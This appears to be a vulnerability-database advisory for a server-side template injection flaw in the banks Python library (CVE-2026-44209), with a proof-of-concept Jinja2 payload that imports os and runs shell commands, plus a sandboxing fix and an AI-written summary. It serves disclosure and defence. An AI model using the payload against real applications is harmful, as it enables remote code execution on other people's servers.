VYPR
High severity · GHSA Advisory · Published May 8, 2026

banks has Critical Remote Code Execution (RCE) via Jinja2 SSTI

CVE-2026-44209

Description

Summary

banks <= 2.4.1 uses jinja2.Environment() (unsandboxed) to render prompt templates. Applications that pass user-supplied strings as the template argument to Prompt() are vulnerable to Server-Side Template Injection (SSTI), which can lead to Remote Code Execution (RCE) on the host system.

This is a vulnerability in how banks initializes its Jinja2 environment — not in Jinja2 itself.

Vulnerable Code

src/banks/env.py — the global Jinja2 environment is created without sandboxing:

from jinja2 import Environment, select_autoescape

# Plain jinja2.Environment: attribute access on template objects is unrestricted,
# so a template can walk self.__init__.__globals__ into Python builtins.
env = Environment(
    autoescape=select_autoescape(enabled_extensions=("html", "xml"), default_for_string=False),
    ...
)

Attack Scenario

An application that stores prompt templates in a database, accepts them via an API, or loads them from a user-supplied config file and passes them to Prompt() is vulnerable. For example:

from banks import Prompt

# User-controlled input reaches Prompt()
user_input = "{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}"
p = Prompt(user_input)
p.text()  # Executes arbitrary command on the host

Proof of Concept

Setup:

pip install banks==2.4.1

PoC script:

from banks import Prompt

payload = "{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}"
p = Prompt(payload)
result = p.text()
print(f"[+] Output: {result}")

Confirmed output:

[+] Output: uid=1000(ak) gid=1000(ak) groups=1000(ak),27(sudo),...

File-write proof:

from banks import Prompt

p = Prompt("{{ self.__init__.__globals__.__builtins__.__import__('os').popen('echo POC > /tmp/rce_banks_exec').read() }}")
p.text()

ls -l /tmp/rce_banks_exec
# -rw-rw-r-- 1 ak ak 4 Apr 27 15:36 /tmp/rce_banks_exec

Impact

Applications that allow end-users to supply or customize prompt templates are at risk of full Remote Code Execution, including arbitrary command execution, data exfiltration, and server compromise.

Fix

Fixed in banks 2.4.2 (PR #74) by switching to jinja2.sandbox.SandboxedEnvironment, which blocks the dunder attribute traversal chain this exploit relies on. Developers on banks <= 2.4.1 should upgrade to 2.4.2 and avoid passing untrusted user input as the template argument to Prompt().

Resources

- Fix: https://github.com/masci/banks/pull/74
- CVE-2024-41950 (Haystack — identical root cause, CVSS 7.5)
- CVE-2025-25362 (spacy-llm — identical root cause)
- CWE-1336: Improper Neutralization of Special Elements in a Template Engine
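The following is an added example, not code from the banks project or the advisory author. It places the unsandboxed jinja2.Environment configuration the advisory quotes from src/banks/env.py beside the jinja2.sandbox.SandboxedEnvironment fix, and shows why the sandbox stops the traversal: SandboxedEnvironment refuses any attribute whose name starts with an underscore, so the second hop of the self.__init__.__globals__ chain raises jinja2's SecurityError instead of returning module globals. The probe template, the render() helper and the is_hardened() check are constructed for this example; the probe reads only the module name of the globals it reaches, which is enough to show the difference without importing os.

```python
"""Added example: vulnerable vs. hardened Jinja2 environment for prompt templates.
Not banks' own code; mirrors the configuration difference between 2.4.1 and 2.4.2."""
from jinja2 import Environment, select_autoescape
from jinja2.exceptions import SecurityError
from jinja2.sandbox import SandboxedEnvironment

# The autoescape policy the advisory quotes from src/banks/env.py.
AUTOESCAPE = select_autoescape(enabled_extensions=("html", "xml"), default_for_string=False)

# "Before": the unsandboxed configuration the advisory describes as vulnerable.
unsandboxed_env = Environment(autoescape=AUTOESCAPE)

# "After": the banks 2.4.2 fix. SandboxedEnvironment.is_safe_attribute rejects every
# attribute name beginning with "_", so self.__init__ becomes an undefined value
# that raises SecurityError as soon as the template dereferences it further.
sandboxed_env = SandboxedEnvironment(autoescape=AUTOESCAPE)


def render(env, template_source, **variables):
    """Render template_source with env; this is what Prompt().text() boils down to."""
    return env.from_string(template_source).render(**variables)


# Constructed probe: the first two hops of the advisory's payload chain, ending in a
# harmless read of the reached module's name rather than an os import.
DUNDER_PROBE = "{{ self.__init__.__globals__.__name__ }}"
# Constructed benign template, to confirm the sandbox does not break normal prompts.
BENIGN_PROMPT = "Summarize the following text in {{ n }} sentences: {{ text }}"


def sandbox_blocks_dunder_traversal(env) -> bool:
    """True if env refuses the dunder traversal by raising SecurityError."""
    try:
        render(env, DUNDER_PROBE)
    except SecurityError:
        return True
    return False


def is_hardened(env) -> bool:
    """Configuration check an application can run against the environment it renders
    prompts with (for banks, against banks.env.env after importing the package)."""
    return isinstance(env, SandboxedEnvironment) and sandbox_blocks_dunder_traversal(env)


if __name__ == "__main__":
    # The unsandboxed environment hands the template jinja2.runtime's globals.
    print("unsandboxed probe ->", render(unsandboxed_env, DUNDER_PROBE))
    # The sandboxed one raises SecurityError at the __globals__ hop.
    print("sandbox blocks traversal:", sandbox_blocks_dunder_traversal(sandboxed_env))
    print("benign prompt still renders:", render(sandboxed_env, BENIGN_PROMPT, n=2, text="..."))
```

The sandbox is a defence in depth, not a reason to pass untrusted strings as templates: a malicious template can still read every variable handed to render(), so the advisory's advice to keep user input out of the template argument still applies after upgrading.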

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

banks <= 2.4.1 uses an unsandboxed Jinja2 environment, allowing SSTI to RCE when user input is passed as a template to Prompt().

Vulnerability

CVE-2026-44209 is a Server-Side Template Injection (SSTI) vulnerability in the banks library (versions ≤2.4.1). The root cause is that src/banks/env.py initializes a Jinja2 environment using jinja2.Environment() without sandboxing, which permits template expressions to access Python builtins and execute arbitrary code [2]. This is not a flaw in Jinja2 itself but in how banks configures it.

Exploitation

An attacker can exploit this by supplying a malicious template string to the Prompt() class, for example via an API endpoint, a database-stored template, or a user-supplied config file. The canonical payload uses the self.__init__.__globals__.__builtins__ chain to import os and run shell commands. A proof-of-concept demonstrates executing id and writing a file to /tmp [2]. No authentication is required if the application exposes the vulnerable functionality to untrusted users.

Impact

Successful exploitation leads to full Remote Code Execution (RCE) on the host system. An attacker can execute arbitrary commands, exfiltrate sensitive data, or compromise the server entirely [2].

Mitigation

The vulnerability is fixed in banks version 2.4.2, which switches to jinja2.sandbox.SandboxedEnvironment to block dunder attribute traversal [3]. Users should upgrade immediately and ensure that untrusted user input is never passed as a template string.

AI Insight generated on May 18, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected packages

Versions sourced from the GitHub Security Advisory.

Package | Affected versions | Patched versions
banks (PyPI) | < 2.4.2 | 2.4.2

Affected products (2)

  • Masci/Banks (GHSA), 2 versions: <= 2.4.1 (+ 1 more)
    • (no CPE) range: <= 2.4.1
    • (no CPE) range: <= 2.4.1

Patches (0)

No patches discovered yet.

Vulnerability mechanics

AI mechanics synthesis has not run for this CVE yet.

References (3)

News mentions (0)

No linked articles in our index yet.